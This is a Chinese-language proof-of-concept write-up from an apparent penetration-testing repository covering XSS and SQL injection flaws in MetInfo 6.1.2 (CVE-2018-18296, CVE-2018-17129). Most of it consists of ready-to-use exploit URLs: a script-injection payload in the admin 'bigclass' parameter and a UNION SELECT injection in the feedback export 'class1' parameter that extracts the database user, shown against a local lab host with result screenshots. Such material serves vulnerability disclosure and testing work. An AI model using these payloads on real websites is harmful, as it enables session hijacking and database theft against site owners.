Penetration_Testing_POC/Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md
2019-07-24 19:29:08 +08:00

39 lines
2.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞|2018-10-12|踏月留香|[https://www.metinfo.cn/](https://www.metinfo.cn/) | [下载地址](https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip) |6.1.2| [CVE-2018-18296](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18296)/[CVE-2018-17129](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17129)|
#### 漏洞概述
> 漏洞存在于MetInfo6.1.2/admin/index.php页面由于参数bigclass过滤不严导致XSS漏洞
本地搭建网站,首先登录网站后台:`http://172.16.141.134/MetInfo6.1.2/admin/`登录成功后构造payload
`http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e` ,即可执行跨站脚本。
### POC实现代码如下
> XSS漏洞的 exp代码如下
``` html
http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e
```
> SQL注入漏洞的 exp代码如下
> 漏洞存在于MetInfo6.1.2 `/app/system/feedback/admin/feedback_admin.class.php`页面中由于该页面的class1参数过滤不严导致存在SQL注入漏洞。
本地搭建网站,首先登录网站后台:`http://172.16.141.134/MetInfo6.1.2/admin/`登录成功后构造payload
`http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(0x3a,user(),0x3a)//from/**/information_schema.tables&met_fd_export=-1`访问后网站会导出一个excel表excel表的名称为数据库用户名。
``` html
http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/concat(0x3a,user(),0x3a)/**/from/**/information_schema.tables&met_fd_export=-1
```
### POC截图效果如下
- XSS漏洞POC运行截图
![XSS漏洞POC运行截图](img/5.png)
- SQL注入漏洞POC运行截图
![SQL注入漏洞POC运行截图](img/6.png)